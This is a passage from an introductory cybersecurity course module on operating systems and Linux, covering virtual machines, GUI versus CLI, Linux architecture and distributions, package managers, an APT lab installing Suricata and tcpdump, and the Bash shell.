the bus would have to drive their own cars. This uses more gas, cars, and other resources than riding the
city bus.
Similar to how many people can ride one bus, many virtual machines can be hosted on the same physical
machine. That way, separate physical machines aren't needed to perform certain tasks.
Managing virtual machines
Virtual machines can be managed with software called a hypervisor. Hypervisors help users manage
multiple virtual machines and connect the virtual and physical hardware. Hypervisors also help with
allocating the shared resources of the physical host machine to one or more virtual machines.
One hypervisor that is useful for you to be familiar with is the Kernel-based Virtual Machine (KVM). KVM
is an open-source hypervisor that is supported by most major Linux distributions. It is built into the Linux
kernel, which means it can be used to create virtual machines on any machine running a Linux operating
system without the need for additional software.
Other forms of virtualization
In addition to virtual machines, there are other forms of virtualization. Some of these virtualization
technologies do not use operating systems. For example, multiple virtual servers can be created from a
single physical server. Virtual networks can also be created to more efficiently use the hardware of a
physical network.
Key takeaways
Virtual machines are virtual versions of physical computers and are one example of virtualization.
Virtualization is a key technology in the security industry, and it’s important for security analysts to
understand the basics. There are many benefits to using virtual machines, such as isolation of malware
and other security risks. However, it’s important to remember there’s still a risk of malicious software
escaping their virtualized environments.
Now that you've learned the inner workings of computers, let's discuss how users and operating
systems communicate with each other. So far, you've learned that a computer has an operating system,
hardware, and applications. Remember, the operating system communicates with the hardware to
execute tasks. In this video, you'll learn how the user—that's you—interacts with the operating system
in order to send tasks to the hardware. The user communicates with the operating system via an
interface. A user interface is a program that allows a user to control the functions
of the operating system. Two user interfaces that we'll discuss are the graphical user interface, or GUI, and
the command-line interface, or CLI. Let's cover these interfaces in more detail. A GUI is a user interface
that uses icons on the screen to manage different tasks on the computer. Most operating systems can be
used with a graphical user interface. If you've used a personal
computer or a cell phone, you have experienced operating a GUI. Most GUIs include these components: a
start menu with program groups, a task bar for launching programs, and a desktop with icons and
shortcuts. All these components help you communicate with the OS to execute tasks. In addition to
clicking on icons, when you use a GUI, you can also search for files or applications from the start menu.
You just have to remember the icon or name of the program to activate an application. Now let's discuss
the command-line interface. In comparison, the command-line interface, or CLI, is a text-based user
interface that uses commands to interact with the computer. These commands communicate with the
operating system and execute tasks like opening programs. The command-line interface has a much
different structure than the graphical user interface. When you use the CLI, you'll immediately notice a
difference. There are no icons or
graphics on the screen. The command-line interface looks like lines of code using certain text languages.
A CLI is more flexible and more powerful than a GUI. Think about using a CLI like creating whatever
meal you'd like from ingredients bought at a grocery store. This gives you a lot of control and
customization over what you're going to eat. In comparison, using a GUI is more like ordering food
from a restaurant. You can only order what's on the menu. If you want both a noodle dish and pizza, but
the first restaurant you go to only has pizza, you'll have to go to another restaurant to order the noodles.
With a graphical user interface, you must do one task at a time. But the command-line interface allows
for customization, which lets you complete multiple tasks simultaneously. For example, imagine you
have a folder with hundreds of files of different file types,
and you need to move only the JPEG files to a new folder. Think about how slow and tedious this would
be as you use a GUI to find each JPEG file in this folder and move it into the new one. On the other hand,
the CLI would allow you to streamline this process and move them all at once. As you can see, there are
very big differences in these two types of user interfaces. As a security analyst, some of your work may
involve the command-line interface. When analyzing logs or authenticating and authorizing users,
security analysts commonly use a CLI in their everyday work. In this video, we discussed two types of
user interfaces. You learned that you already have experience using a
graphical user interface, as most personal computers and cell phones use a GUI. You were introduced to
the command-line interface.
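The JPEG example from this video takes a single command in the shell. This sketch uses hypothetical folder names (photos and jpegs) to make the demo self-contained:

```shell
# Move every JPEG out of a mixed folder in one command,
# instead of dragging files one by one in a GUI.
mkdir -p photos jpegs                   # hypothetical folders for the demo
touch photos/a.jpg photos/b.jpg photos/notes.txt
mv photos/*.jpg jpegs/                  # one command moves all JPEG files
ls jpegs                                # the JPEGs are now in the new folder
```

The `*.jpg` wildcard matches every file ending in `.jpg`, so the same command works whether the folder holds two JPEGs or two hundred.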
The command line in use
Previously, you explored graphical user interfaces (GUI) and command-line user interfaces (CLI). In this
reading, you’ll compare these two interfaces and learn more about how they’re used in cybersecurity.
CLI vs. GUI
A graphical user interface (GUI) is a user interface that uses icons on the screen to manage different
tasks on the computer. A command-line interface (CLI) is a text-based user interface that uses
commands to interact with the computer.
Display
One notable difference between these two interfaces is how they appear on the screen. A GUI has
graphics and icons, such as the icons on your desktop or taskbar for launching programs. In contrast, a
CLI only has text. It looks similar to lines of code.
Function
These two interfaces also differ in how they function. A GUI is an interface that only allows you to make
one request at a time. However, a CLI allows you to make multiple requests at a time.
Advantages of a CLI in cybersecurity
The choice between using a GUI or CLI is partly based on personal preference, but security analysts
should be able to use both interfaces. Using a CLI can provide certain advantages.
Efficiency
Some prefer the CLI because it can be used more quickly once you know how to manage this interface.
For a new user, a GUI might be more efficient because it's easier for beginners to navigate.
Because a CLI can accept multiple requests at one time, it’s more powerful when you need to perform
multiple tasks efficiently. For example, if you had to create multiple new files in your system, you could
quickly perform this task in a CLI. If you were using a GUI, this could take much longer, because you have
to repeat the same steps for each new file.
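The file-creation example above can be done with one command using brace expansion. The report names here are hypothetical:

```shell
# Brace expansion creates five files in a single command; doing this
# in a GUI would mean five separate create-and-rename steps.
touch report_{1..5}.txt
ls report_*.txt                         # lists report_1.txt through report_5.txt
```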
History file
For security analysts, using the Linux CLI is helpful because it records a history file of all the commands
and actions in the CLI. If you're using a GUI, your actions are not necessarily saved in a history file.
For example, you might be in a situation where you’re responding to an incident using a playbook. The
playbook’s instructions require you to run a series of different commands. If you used a CLI, you’d be
able to go back to the history and ensure all of the commands were correctly used. This could be helpful
if there were issues using the playbook and you had to review the steps you performed in the command
line.
Additionally, if you suspect an attacker has compromised your system, you might be able to trace their
actions using the history file.
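A minimal sketch of the history mechanism in bash. Non-interactive shells disable history, so this script enables it explicitly; the recorded commands are placeholders:

```shell
# Enable history recording and write it to a temporary history file.
HISTFILE=$(mktemp)
set -o history                          # history is off in scripts by default

echo "investigating incident"           # each command is recorded as it runs
echo "checking logs"

history -w                              # flush the in-memory history to $HISTFILE
grep -c "echo" "$HISTFILE"              # both echo commands appear in the file
```

In an interactive session you would simply run `history` to review the commands you entered, or inspect `~/.bash_history` after the session ends.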
Key takeaways
GUIs and CLIs are two types of user interfaces that security analysts should be familiar with. There are
multiple differences between a GUI and a CLI, including their displays and how they function. When
working in cybersecurity, a CLI is often preferred over a GUI because it can handle multiple tasks
simultaneously and it includes a history file.
Glossary terms from module 1
Terms and definitions from Course 4, Module 1
Application: A program that performs a specific task
Basic Input/Output System (BIOS): A microchip that contains loading instructions for the computer and
is prevalent in older systems
Bootloader: A software program that boots the operating system
Command-line interface (CLI): A text-based user interface that uses commands to interact with the
computer
Graphical user interface (GUI): A user interface that uses icons on the screen to manage different tasks
on the computer
Hardware: The physical components of a computer
Legacy operating system: An operating system that is outdated but still being used
Operating system (OS): The interface between computer hardware and the user
Random Access Memory (RAM): A hardware component used for short-term memory
Unified Extensible Firmware Interface (UEFI): A microchip that contains loading instructions for the
computer and replaces BIOS on more modern systems
User interface: A program that allows the user to control the functions of the operating system
Virtual machine (VM): A virtual version of a physical computer
Introduction to Linux
You might have seen or heard the name Linux in the past. But did you know Linux is the most-used
operating system in security today? Let's start by taking a look at Linux and
how it's used in security. Linux is an open-source operating system. It was created in two parts. In
the early 1990s, two different people were working separately on projects to improve computer
engineering. The first person was Linus Torvalds. At the time, the UNIX operating
system was already in use. He wanted to improve it and make it open source and accessible to
anyone. What was revolutionary was his introduction of the Linux kernel. We're going to learn what
the kernel does later. Around the same time, Richard Stallman started working on GNU. GNU was
also an operating system based on UNIX. Stallman shared Torvalds' goal of
creating software that was free and open to anyone. After working on GNU for
a few years, the missing element for the software was a kernel. Together, Torvalds' and Stallman’s
innovations made what is commonly referred to as Linux. Now that you've learned
the history behind Linux, let's take a look at
what makes Linux unique. As mentioned before, Linux is open source, meaning anyone can have
access to the operating system and the source code. Linux and many of the programs that come
with Linux are licensed under the terms of the GNU General Public License (GPL), which allow you
to use, share, and modify them freely. Thanks to Linux's open-source philosophy as well as a strong
feature set, an entire community of developers has adopted this operating system. These
developers can collaborate on projects and advance computing together. As a security analyst,
you'll discover that Linux is used at different organizations. More specifically, Linux is used in many
security programs. Another unique feature about Linux is the different distributions, or varieties,
that have been developed. Because of the large community contribution, there are over 600
distributions of Linux. Later you'll learn more about distributions. Finally, let's look at how you
would use Linux in an entry-level security position. As a security analyst, you'll use many tools and
programs in everyday work. You might examine different types of logs to identify what's going on in
the system. For example, you might find yourself looking at an error log when investigating an
issue. Another place where you will use Linux is to verify access and authorization in an identity
and access management system. In security, managing access is key to ensure a secure system.
We'll take a closer look into access and authorization later. Finally, as an analyst, you might find
yourself working with specific distributions designed for a particular task. For example, you might
use a distribution that has a digital forensic tool to investigate what happened in an event alert. You
might also use a distribution that's for pen testing in offensive security to look for vulnerabilities in
the system. Distributions are created to fit the needs of their users.
Linux Architecture
Let me start with a quick question that may seem unrelated to security. Do you have a favorite
building? And what is it about its architecture that
impresses you the most? The windows? The structure of the walls? Just like buildings,
operating systems also have an architecture and are made up of discrete components that work
together to form the whole. In this video, we're going to look at all the components that
together make up Linux. The components of Linux include the user, applications, the shell, the
Filesystem Hierarchy Standard, the kernel, and the hardware. Don't worry—we'll go into these
components one by one together. First, you are the user. The user is the person
interacting with the computer. In Linux, you're the first element to the architecture of
the operating system. You're initiating the tasks or commands that the OS
is going to execute. Linux is a multi-user system. This means that more
than one user can use the system's resources at the same time. The second element
of the architecture is the applications within a system. An application is a program that performs a
specific task, such as a word processor or a calculator. You might hear the
words "applications" and "programs" used interchangeably. As an example, one popular Linux
application that we'll learn more about later is Nano. Nano is a text editor. This simple application
helps you keep notes on the screen. Linux applications are commonly distributed through package
managers. We'll learn more about this process later. The next component
in the architecture of Linux is the shell. This is an important element because it is how you will
communicate with the system. The shell is a command line interpreter. It processes commands and
outputs the results. This might sound familiar. Previously, we learned about the two types of user
interfaces: the GUI and the CLI. You can think of the shell as a CLI. Another element of the
architecture of Linux is the Filesystem Hierarchy Standard, or FHS. It's the component of the Linux
OS that organizes data. An easy way for you to think about the FHS is to think about it as a filing
cabinet of data. The FHS is how data is stored in a
system. It's a way to organize data so that it can be found when the data is accessed by the system.
That brings us to the kernel. The kernel is a component of the Linux OS that manages processes and
memory. The kernel communicates with the hardware to execute the commands sent by the shell.
The kernel uses drivers to enable applications to execute tasks. The Linux kernel helps ensure that
the system allocates resources more efficiently and makes the system work faster. Finally, the last
component of the architecture is the hardware. Hardware refers to the physical components of a
computer. You can compare this to software applications which can be downloaded into a system.
The hardware in your computer are things like the CPU, mouse, and keyboard.
Linux architecture explained
Understanding the Linux architecture is important for a security analyst. When you understand how a
system is organized, it makes it easier to understand how it functions. In this reading, you’ll learn more
about the individual components in the Linux architecture. A request to complete a task starts with the
user and then flows through applications, the shell, the Filesystem Hierarchy Standard, the kernel, and
the hardware.
User
The user is the person interacting with a computer. They initiate and manage computer tasks. Linux is a
multi-user system, which means that multiple users can use the same resources at the same time.
Applications
An application is a program that performs a specific task. There are many different applications on your
computer. Some applications typically come pre-installed on your computer, such as calculators or
calendars. Other applications might have to be installed, such as some web browsers or email clients. In
Linux, you'll often use a package manager to install applications. A package manager is a tool that helps
users install, manage, and remove packages or applications. A package is a piece of software that can be
combined with other packages to form an application.
Shell
The shell is the command-line interpreter. Everything entered into the shell is text based. The shell
allows users to give commands to the kernel and receive responses from it. You can think of the shell as
a translator between you and your computer. The shell translates the commands you enter so that the
computer can perform the tasks you want.
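A first interaction with the shell might look like the following; each line is a command the shell interprets, and each result comes back as text:

```shell
# The shell reads each command, passes the work to the system,
# and prints the result back as text.
echo "Hello, shell"                     # prints the quoted text
whoami                                  # prints the current user's login name
date                                    # prints the current date and time
```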
Filesystem Hierarchy Standard (FHS)
The Filesystem Hierarchy Standard (FHS) is the component of the Linux OS that organizes data. It
specifies the location where data is stored in the operating system.
A directory is a file that organizes where other files are stored. Directories are sometimes called
“folders,” and they can contain files or other directories. The FHS defines how directories, directory
contents, and other storage is organized so the operating system knows where to find specific data.
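You can see the FHS layout directly from the shell. The exact set of top-level directories varies slightly by distribution, but the standard locations below exist on most Linux systems:

```shell
# List the top-level directories that the FHS defines.
ls /
# Two standard locations and what they hold:
ls -ld /etc                             # system configuration files
ls -ld /var                             # variable data, such as logs
```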
Kernel
The kernel is the component of the Linux OS that manages processes and memory. It communicates with
the applications to route commands. The Linux kernel is unique to the Linux OS and is critical for
allocating resources in the system. The kernel controls all major functions of the hardware, which helps
tasks get completed more efficiently.
Hardware
The hardware is the physical components of a computer. You might be familiar with some hardware
components, such as hard drives or CPUs. Hardware is categorized as either peripheral or internal.
Peripheral devices
Peripheral devices are hardware components that are attached and controlled by the computer system.
They are not core components needed to run the computer system. Peripheral devices can be added or
removed freely. Examples of peripheral devices include monitors, printers, the keyboard, and the
mouse.
Internal hardware
Internal hardware consists of the components required to run the computer. Internal hardware includes a main
circuit board and all components attached to it. This main circuit board is also called the motherboard.
Internal hardware includes the following:
● The Central Processing Unit (CPU) is a computer’s main processor, which is used to perform general computing tasks on a computer. The CPU executes the instructions provided by programs, which enables these programs to run.
● Random Access Memory (RAM) is a hardware component used for short-term memory. It’s where data is stored temporarily as you perform tasks on your computer. For example, if you’re writing a report on your computer, the data needed for this is stored in RAM. After you’ve finished writing the report and closed down that program, this data is deleted from RAM. Information in RAM cannot be accessed once the computer has been turned off. The CPU takes the data from RAM to run programs.
● The hard drive is a hardware component used for long-term memory. It’s where programs and files are stored for the computer to access later. Information on the hard drive can be accessed even after a computer has been turned off and on again. A computer can have multiple hard drives.
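On a Linux system you can inspect these internal components from the shell. The commands and files below are standard on Linux but may differ on other operating systems:

```shell
# Inspect internal hardware from the command line.
nproc                                   # number of CPU processing units
grep MemTotal /proc/meminfo             # total RAM known to the kernel
df -h /                                 # disk space on the root filesystem
```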
Key takeaways
It’s important for security analysts to understand the Linux architecture and how these components are
organized. The components of the Linux architecture are the user, applications, shell, Filesystem
Hierarchy Standard, kernel, and hardware. Each of these components is important in how Linux
functions.
Let's learn a little bit more about Linux and what you need to know about this operating system when
working as a security analyst. Linux is a very customizable operating system. Unlike other operating
systems, there are different versions available for you to use. These different versions of Linux are called
distributions. You might also hear them called distros or flavors of Linux. It's essential for you to
understand the distribution that you're using so you know what tools and apps are available to you. For
example, Debian is a distro that has different tools than the Ubuntu distribution. Let's use an analogy to
describe Linux distributions. Think of the OS as a vehicle. First, we'll start with its engine—that would be
the kernel. Just as the engine makes a vehicle run, the kernel is the most important component of the
Linux OS. Because the Linux kernel is open source, anyone can take the kernel and modify it to build a
new distribution. This is comparable to a vehicle manufacturer taking an engine and creating different
types of vehicles: trucks, cars, vans, convertibles, buses, airplanes, and so on. These different types of
vehicles can be compared to different Linux distributions. A bus is used to transport lots of people. A
truck is used to transport many goods across vast distances. An aircraft transports passengers or goods
by air. Just as each vehicle serves its own purpose, different distributions are used for different reasons.
Additionally, vehicles all have different components which distinguish them from each other. Aircrafts
have control panels with buttons and knobs. Regular cars have four tires, but trucks can have more.
Similarly, different Linux distributions contain different preinstalled programs, user interfaces, and
much more. A lot of this is based on what the Linux user needs, but some distros are also chosen based
on preference—the same way a sports car might be chosen as a vehicle. The advantage of using Linux as
an OS is that you can customize it. Distributions include the Linux kernel, utilities, a package management
system, and an installer. We learned earlier that Linux is open source, and anyone can contribute to
adding to the source code. That is how new distributions are created. All distros are derived from
another distro, but there are a few that are considered parent distributions. Red Hat® is the parent of
CentOS, and Slackware® is the parent of SUSE®. Both Ubuntu and KALI LINUX™ are derived from Debian.
KALI LINUX
KALI LINUX™ is a trademark of Offensive Security and is Debian derived. This open-source distro
was made specifically with penetration testing and digital forensics in mind. There are many tools
pre-installed into KALI LINUX™. It's important to note that KALI LINUX™ should be used on a virtual
machine. This prevents damage to your system in the event its tools are used improperly. An
additional benefit is that using a virtual machine gives you the ability to revert to a previous state.
As security professionals advance in their careers, some specialize in penetration testing. A
penetration test is a simulated attack that helps identify vulnerabilities in systems, networks,
websites, applications, and processes. KALI LINUX™ has numerous tools that are useful during
penetration testing. Let's look at a few examples. To begin, Metasploit can be used to look for and
exploit vulnerabilities on machines. Burp Suite is another tool that helps to test for weaknesses in
web applications. And finally, John the Ripper is a tool used to guess passwords. As a security
analyst, your work might involve digital forensics. Digital forensics is the process of collecting and
analyzing data to determine what has happened after an attack. For example, you might take an
investigative look at data related to network activity. KALI LINUX™ is also a useful distribution for
security professionals who are involved in digital forensic work. It has a large number of tools that
can be used for this. As one example, tcpdump is a command-line packet analyzer. It's used to
capture network traffic. Another tool commonly used in the security profession is Wireshark. It has
a graphical user interface that can be used to analyze live and captured network traffic. And as a final
example, Autopsy is a forensic tool used to analyze hard drives and smartphones. These are just a
few tools included with KALI LINUX™. This distribution has many tools used to conduct pen testing
and digital forensics. We've explored how KALI LINUX™ is an important distribution that's widely
used in security, but there are other distributions that security professionals use as well.
More Linux distributions
Previously, you were introduced to the different distributions of Linux. This included KALI LINUX ™.
(KALI LINUX ™ is a trademark of OffSec.) In addition to KALI LINUX ™, there are multiple other Linux
distributions that security analysts should be familiar with.
KALI LINUX ™
KALI LINUX ™ is an open-source distribution of Linux that is widely used in the security industry. This is
because KALI LINUX ™, which is Debian-based, is pre-installed with many useful tools for penetration
testing and digital forensics. A penetration test is a simulated attack that helps identify vulnerabilities in
systems, networks, websites, applications, and processes. Digital forensics is the practice of collecting
and analyzing data to determine what has happened after an attack. These are key activities in the
security industry.
However, KALI LINUX ™ is not the only Linux distribution that is used in cybersecurity.
Ubuntu
Ubuntu is an open-source, user-friendly distribution that is widely used in security and other industries.
It has both a command-line interface (CLI) and a graphical user interface (GUI). Ubuntu is also Debian-derived and includes common applications by default. Users can also download many more applications
from a package manager, including security-focused tools. Because of its wide use, Ubuntu has an
especially large number of community resources to support users.
Ubuntu is also widely used for cloud computing. As organizations migrate to cloud servers,
cybersecurity work may more regularly involve Ubuntu derivatives.
Parrot
Parrot is an open-source distribution that is commonly used for security. Similar to KALI LINUX ™,
Parrot comes with pre-installed tools related to penetration testing and digital forensics. Like both KALI
LINUX ™ and Ubuntu, it is based on Debian.
Parrot is also considered to be a user-friendly Linux distribution. This is because it has a GUI that many
find easy to navigate. This is in addition to Parrot’s CLI.
Red Hat® Enterprise Linux®
Red Hat Enterprise Linux is a subscription-based distribution of Linux built for enterprise use. Red Hat is
not free, which is a major difference from the previously mentioned distributions. Because it’s built and
supported for enterprise use, Red Hat also offers a dedicated support team for customers to call about
issues.
CentOS
CentOS is an open-source distribution that is closely related to Red Hat. It uses source code published by
Red Hat to provide a similar platform. However, CentOS does not offer the same enterprise support that
Red Hat provides and is supported through the community.
Key takeaways
KALI LINUX ™, Ubuntu, Parrot, Red Hat, and CentOS are all widely used Linux distributions. It’s
important for security analysts to be aware of these distributions that they might encounter in their
career.
Package managers for installing applications
Previously, you learned about Linux distributions and that different distributions derive from different
sources, such as Debian or Red Hat Enterprise Linux distribution. You were also introduced to package
managers, and learned that Linux applications are commonly distributed through package managers. In
this reading, you’ll apply this knowledge to learn more about package managers.
Introduction to package managers
A package is a piece of software that can be combined with other packages to form an application. Some
packages may be large enough to form applications on their own.
Packages contain the files necessary for an application to be installed. These files include dependencies,
which are supplemental files used to run an application.
Package managers can help resolve any issues with dependencies and perform other management tasks.
A package manager is a tool that helps users install, manage, and remove packages or applications. Linux
uses multiple package managers.
Note: It’s important to use the most recent version of a package when possible. The most recent version
has the most up-to-date bug fixes and security patches. These help keep your system more secure.
Types of package managers
Many commonly used Linux distributions are derived from the same parent distribution. For example,
KALI LINUX ™, Ubuntu, and Parrot all come from Debian. CentOS comes from Red Hat.
This knowledge is useful when installing applications because certain package managers work with
certain distributions. For example, the Red Hat Package Manager (RPM) can be used for Linux
distributions derived from Red Hat, and package managers such as dpkg can be used for Linux
distributions derived from Debian.
Different package managers typically use different file extensions. For example, the Red Hat Package
Manager (RPM) has files which use the .rpm file extension, such as Package-Version-Release_Architecture.rpm. Package managers for Debian-derived Linux distributions, such as dpkg, have
files which use the .deb file extension, such as Package_Version-Release_Architecture.deb.
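To illustrate the Debian naming convention just described, the following sketch uses Bash parameter expansion to split a package filename into its name, version, and architecture fields. The filename shown is a made-up example following the Package_Version-Release_Architecture.deb pattern, not a real file on your system:

```shell
# Hypothetical filename following the Package_Version-Release_Architecture.deb
# convention (the package name and version here are only for illustration).
pkg="suricata_4.1.2-2_amd64.deb"

base="${pkg%.deb}"            # strip the .deb extension
name="${base%%_*}"            # everything before the first underscore
arch="${base##*_}"            # everything after the last underscore
version="${base#${name}_}"    # drop the leading "name_" portion
version="${version%_${arch}}" # drop the trailing "_architecture" portion

echo "name=$name version=$version arch=$arch"
```

Running the sketch prints name=suricata version=4.1.2-2 arch=amd64, which correspond to the three fields in the convention.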
Package management tools
In addition to package managers like RPM and dpkg, there are also package management tools that
allow you to easily work with packages through the shell. Package management tools are sometimes
utilized instead of package managers because they allow users to perform basic tasks more easily, such
as installing a new package. Two notable tools are the Advanced Package Tool (APT) and Yellowdog
Updater Modified (YUM).
Advanced Package Tool (APT)
APT is a tool used with Debian-derived distributions. It is run from the command-line interface to
manage, search, and install packages.
Yellowdog Updater Modified (YUM)
YUM is a tool used with Red Hat-derived distributions. It is run from the command-line interface to
manage, search, and install packages. YUM works with .rpm files.
Key takeaways
A package is a piece of software that can be combined with other packages to form an application.
Packages can be managed using a package manager. There are multiple package managers and package
management tools for different Linux distributions. Package management tools allow users to easily
work with packages through the shell. Debian-derived Linux distributions use package managers like
dpkg as well as package management tools like Advanced Package Tool (APT). Red Hat-derived
distributions use the Red Hat Package Manager (RPM) or tools like Yellowdog Updater Modified (YUM).
Activity: Install software in a Linux distribution
Introduction
In this lab, you’ll learn how to install and uninstall applications in Linux. You’ll use Linux commands in
the Bash shell to complete this lab. You’ll also use the Advanced Package Tool (APT) package manager to
install and uninstall the Suricata and tcpdump applications.
What you’ll do
You have multiple tasks in this lab:
● Confirm APT is installed in Bash
● Install Suricata with APT
● Uninstall Suricata with APT
● Install tcpdump with APT
● Reinstall Suricata with APT
Lab instructions
Start the lab
Before you start, you can review the Resources for completing Linux labs. Then from this page, click
Launch App. A Qwiklabs page will open and from that page, click Start Lab to begin the activity!
Best practices for completing labs:
● Make sure your browser is up to date with the latest version.
● Make sure your internet connection is stable.
● After you complete the lab, leave the lab window open for at least 10 minutes in order to allow the system to record your progress.
● If you run into issues connecting to the lab, try logging into Coursera in an Incognito mode and completing the lab there.
Activity overview
In this lab activity, you’ll use the Advanced Package Tool (APT) and sudo to install and uninstall
applications in a Linux Bash shell.
While installing Linux applications can be a complex task, the APT package manager manages most
of this complexity for you and allows you to quickly and reliably manage the applications in a Linux
environment.
You'll use Suricata and tcpdump as an example. These are network security applications that can be
used to capture and analyze network traffic.
The virtual machine you access in this lab runs a Debian-based distribution of Linux, which works
with the APT package manager. Using a virtual machine prevents damage to a system in
the event its tools are used improperly. It also gives you the ability to revert to a previous state.
As a security analyst, it's likely you'll need to know how to install and manage applications on a
Linux operating system. In this lab activity, you’ll learn how to do exactly that!
Scenario
Your role as a security analyst requires that you have the Suricata and tcpdump network security
applications installed on your system.
In this scenario, you have to install, uninstall, and reinstall these applications on your Linux Bash
shell. You also need to confirm that you’ve installed them correctly.
Here’s how you'll do this: First, you’ll confirm that APT is installed on your Linux Bash shell. Next,
you’ll use APT to install the Suricata application and confirm that it is installed. Then, you’ll
uninstall the Suricata application and confirm this as well. Next, you’ll install the tcpdump
application and list the applications currently installed. Finally, you’ll reinstall the Suricata
application and confirm that both applications are installed.
OK, it's time to learn how to install some applications!
Task 1. Ensure that APT is installed
First, you’ll check that the APT application is installed so that you can use it to manage applications.
The simplest way to do this is to run the apt command in the Bash shell and check the response.
The Bash shell is the command-line interpreter currently open on the left side of the screen. You’ll
use the Bash shell by typing commands after the prompt. The prompt is represented by a dollar
sign ($) followed by the input cursor.
Confirm that the APT package manager is installed in your Linux environment. To do this,
type apt after the command-line prompt and press ENTER.
When installed, apt displays basic usage information when you run it. This includes the version
information and a description of the tool:
apt 1.8.2.3 (amd64)
Usage: apt [options] command
apt is a commandline package manager and provides commands for
searching and managing as well as querying information about packages.
It provides the same functionality as the specialized APT tools,
like apt-get and apt-cache, but enables options more suitable for
interactive use by default.
...
APT is already installed by default in the Linux Bash shell in this lab because this is a
Debian-based system. APT is also the recommended package manager for Debian. If you’re
using another distribution, a different package manager, such as YUM, may be available
instead.
Click Check my progress to verify that you have completed this task correctly.
Ensure that APT is installed
Check my progress
Task 2. Install and uninstall the Suricata application
In this task, you must install Suricata, a network analysis tool used for intrusion detection,
and verify that it installed correctly. Then, you’ll uninstall the application.
1. Use the APT package manager to install the Suricata application.
Type sudo apt install suricata after the command-line prompt and press ENTER.
When prompted to continue, press the ENTER key to respond with the default response.
(In this case, the default response is Yes.)
2. Verify that Suricata is installed by running the newly installed application.
Type suricata after the command-line prompt and press ENTER.
When Suricata is installed, version and usage information is listed:
Suricata 4.1.2
USAGE: suricata [OPTIONS] [BPF FILTER]
-c : path to configuration file
-T : test configuration file (use with -c)
...
3. Use the APT package manager to uninstall Suricata.
Type sudo apt remove suricata after the command-line prompt and press ENTER.
When prompted to continue, press the ENTER key to respond with the default response.
(In this case, the default response is Yes.)
4. Verify that Suricata has been uninstalled by running the application command again.
Type suricata after the command-line prompt and press ENTER.
If you have uninstalled Suricata, the output is an error message:
-bash: /usr/bin/suricata: No such file or directory
This message indicates that Suricata can't be found anymore.
Click Check my progress to verify that you have completed this task correctly.
Install and uninstall the Suricata application
Check my progress
Task 3. Install the tcpdump application
In this task, you must install the tcpdump application. This is a command-line tool that can be used
to capture network traffic in a Linux Bash shell.
● Use the APT package manager to install tcpdump.
Type sudo apt install tcpdump after the command-line prompt and press ENTER.
Click Check my progress to verify that you have completed this task correctly.
Install the tcpdump application
Check my progress
Task 4. List the installed applications
Next, you need to confirm that you’ve installed the required applications. It's important to be able
to validate that the correct applications are installed. Often you may want to check that the correct
versions are installed as well.
1. Use the APT package manager to list all installed applications.
Type apt list --installed after the command-line prompt and press ENTER.
This produces a long list of applications because Linux has a lot of software installed by
default.
2. Search through the list to find the tcpdump application you installed.
The Suricata application is not listed because you installed and then uninstalled that
application:
...
tcpdump/oldstable,now 4.9.3-1~deb10u2 amd64 [installed]
...
Note: The specific version of tcpdump that you see displayed may be different from what is shown
above.
Click Check my progress to verify that you have completed this task correctly.
List the installed applications
Check my progress
Task 5. Reinstall the Suricata application
In this task, you must reinstall the Suricata application and verify that it has installed
correctly.
1. Run the command to install the Suricata application.
Type sudo apt install suricata after the command-line prompt and press ENTER.
When prompted to continue, press the ENTER key to respond with the default response.
(In this case, the default response is Yes.)
2. Use the APT package manager to list the installed applications.
Type apt list --installed after the command-line prompt and press ENTER.
3. Search through the list to confirm that the Suricata application has been installed.
The output should include the following lines:
...
suricata/oldstable,now 1:4.1.2-2+deb10u1 amd64 [installed]
...
tcpdump/oldstable,now 4.9.3-1~deb10u2 amd64 [installed]
...
Click Check my progress to verify that you have completed this task correctly.
Reinstall the Suricata application
Check my progress
Conclusion
Great work!
You now have practical experience with the APT package manager. You learned to:
● install applications,
● uninstall applications, and
● list installed applications.
Being able to manage installed applications in Linux is a key skill for any security analyst.
Introduction to the Shell
Welcome back! In this video, we're going to discuss the Linux shell. This part of the Linux
architecture is where the action will happen for you as a security analyst. We introduced the shell
with other components of the Linux OS earlier, but let's take a deeper look at
what the shell is and what it does. The shell is the command-line interpreter. That means it helps
you communicate with the operating system through the command line. Previously, we discussed a
command-line interface. This is essentially the shell. The shell provides the command-line interface
for you to interact with the OS. To tell the OS what to do, you enter
commands into this interface. A command is an instruction telling the computer to do something.
The shell communicates with the kernel to execute these commands. Earlier, we discussed how
the operating system helps humans and computers speak with each other. The shell is the part of
the OS that allows you to do this. Think of this as a very helpful language
interpreter between you and your system. Since you do not speak computer language or binary, you
can't directly communicate with your system. This is where the shell comes in to help you. Your OS
doesn't need the shell for most of its work, but it is an interface between you and what your system
can offer. It allows you to perform math, run tests, and execute applications. More importantly, it
allows you to combine these operations and connect applications to each other to perform complex
and automated tasks. Just as there are many Linux distributions, there are many different types of
shells. We'll primarily focus on the Bash shell in this course.
Different types of shells
Knowing how to work with Linux shells is an important skill for cybersecurity professionals. Shells can
be used for many common tasks. Previously, you were introduced to shells and their functions. This
reading will review shells and introduce you to different types, including the one that you'll use in this
course.
Communicate through a shell
As you explored previously, the shell is the command-line interpreter. You can think of a shell as a
translator between you and the computer system. Shells allow you to give commands to the computer
and receive responses from it. When you enter a command into a shell, the shell executes many internal
processes to interpret your command, send it to the kernel, and return your results.
Types of shells
The many different types of Linux shells include the following:
● Bourne-Again Shell (bash)
● C Shell (csh)
● Korn Shell (ksh)
● Enhanced C shell (tcsh)
● Z Shell (zsh)
All Linux shells use common Linux commands, but they can differ in other features. For example, ksh
and bash use the dollar sign ($) to indicate where users type in their commands. Other shells, such as
zsh, use the percent sign (%) for this purpose.
Bash
Bash is the default shell in most Linux distributions. It’s considered a user-friendly shell. You can use
bash for basic Linux commands as well as larger projects.
Bash is also the most popular shell in the cybersecurity profession. You’ll use bash throughout this
course as you learn and practice Linux commands.
Key takeaways
Shells are a fundamental part of the Linux operating system. Shells allow you to give commands to the
computer and receive responses from it. They can be thought of as a translator between you and your
computer system. There are many different types of shells, but the bash shell is the most commonly used
shell in the cybersecurity profession. You’ll learn how to enter Linux commands through the bash shell
later in this course.
Hello again! In this video, we're going to learn
a little more about the shell and how to
communicate with it. Communicating with a computer is like having a conversation
with your friend. One person asks a question and the other person
answers with a response. If you don't know the answer, you can just say you
don't know the answer. When you communicate
with the shell, the commands in the
shell can take input, give output, or give
error messages. Let's explore standard input, standard output, and error
messages in more detail. Standard input consists
of information received by the OS
via the command line. This is like you
asking your friend a question during
a conversation. The information is input from
your keyboard to the shell. If the shell can
interpret your request, it asks the kernel
for the resources it needs to execute
the related task. Let's take a look at
this through echo, a Linux command that outputs
a specified string of text. String data is data consisting of an ordered sequence
